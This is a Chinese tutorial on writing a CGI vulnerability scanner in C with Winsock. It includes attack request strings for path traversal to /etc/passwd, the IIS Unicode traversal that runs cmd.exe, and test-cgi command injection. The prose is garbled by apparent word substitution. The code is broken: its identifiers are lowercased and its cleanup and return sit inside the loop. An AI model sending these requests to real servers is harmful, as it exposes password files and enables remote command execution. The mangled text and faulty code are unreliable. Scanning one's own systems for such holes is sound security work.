时间: 2021-07-31 作者:daque
一、缺点扫描器基础道理: 编写漏洞扫描器探查长途效劳器上大概生存的具备安定心腹之患的文献能否生存,它的socket创造进程和上头的端口扫描器是沟通的,所各别的是缺点扫描器常常运用80端口,而后对这个端口发送一个get文献的乞求,效劳器接受到乞求会归来文献实质,即使文献不生存则归来一个缺点提醒,经过接受归来实质不妨确定文献能否生存。发送和接受数据须要运用因变量send()和recv(),其余对流中生存的字符串举行确定须要运用因变量strstr(),这除去须要完备socket因变量库的常识除外,还须要少许相关string因变量库的常识。 二、大略的缺点扫描源代码: /********************************************/ /* 端口扫描器 源代码 */ /* cgiscanner.cpp */ /********************************************/ #include <stdio.h> #include <string.h> #include <winsock.h> int main(int argc,char *argv[]) { if(argc!=2){ printf("useage : scan [ip address]\n"); return(1); } struct sockaddr_in blah; struct hostent *he; wsadata wsadata; int i; word wversionrequested; socket sock; char buff[1024]; char *ex[10]; ex[1]="get /../../../../etc/passwd http/1.0\n\n"; ex[2]="get /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\ http/1.0\n\n"; ex[3]="get /a.ida/%c1%00.ida http/1.0\n\n"; ex[4]="get /cgi-bin/pfdispaly.cgi?/../../../../etc/motd http/1.0\n\n"; ex[5]="get /cgi-bin/test-cgi?\help&0a/bin/cat%20/etc/passwd http/1.0\n\n"; ex[6]="get /cgi-bin/test-cgi?* http/1.0\n\n"; char *fmsg="http/1.1 200 ok"; wversionrequested = makeword( 1, 1 ); if (wsastartup(wversionrequested , &wsadata)){ printf("winsock initialization failed.\n"); exit(1); } if ((sock=socket(af_inet,sock_stream,0))==invalid_socket){ printf("can not create socket.\n"); exit(1); } sock = socket(af_inet,sock_stream,0); blah.sin_family = af_inet; blah.sin_port = htons(80); blah.sin_addr.s_addr= inet_addr(argv[1]); if ((he=gethostbyname(argv[1]))!=null){ memcpy((char *)&blah.sin_addr.s_addr,he->h_addr,he->h_length); } else{ if((blah.sin_addr.s_addr=inet_addr(argv[1]))==-1){ wsacleanup(); exit(1); } } for (i=1 ; i<7; i++) { if (connect(sock,(struct sockaddr*)&blah,sizeof(blah))==0){ send(sock,ex[i],strlen(ex[i]),0); recv(sock,buff,sizeof(buff),0); if(strstr(buff,fmsg)!=null){ printf("\nfound :%s\n", ex[i]); } } closesocket(sock); wsacleanup(); return(1); } } 这段代码不妨检验和测定六个缺点,读者群不妨按照本人的须要减少缺点扫描的数目。步调实行的很简略,详细起来这段步调实行了一下四项处事: 1、贯穿目的长机server; 2、向目的长机发送get乞求; 3、接受目的归来数据; 4、按照归来数据确定文献能否生存。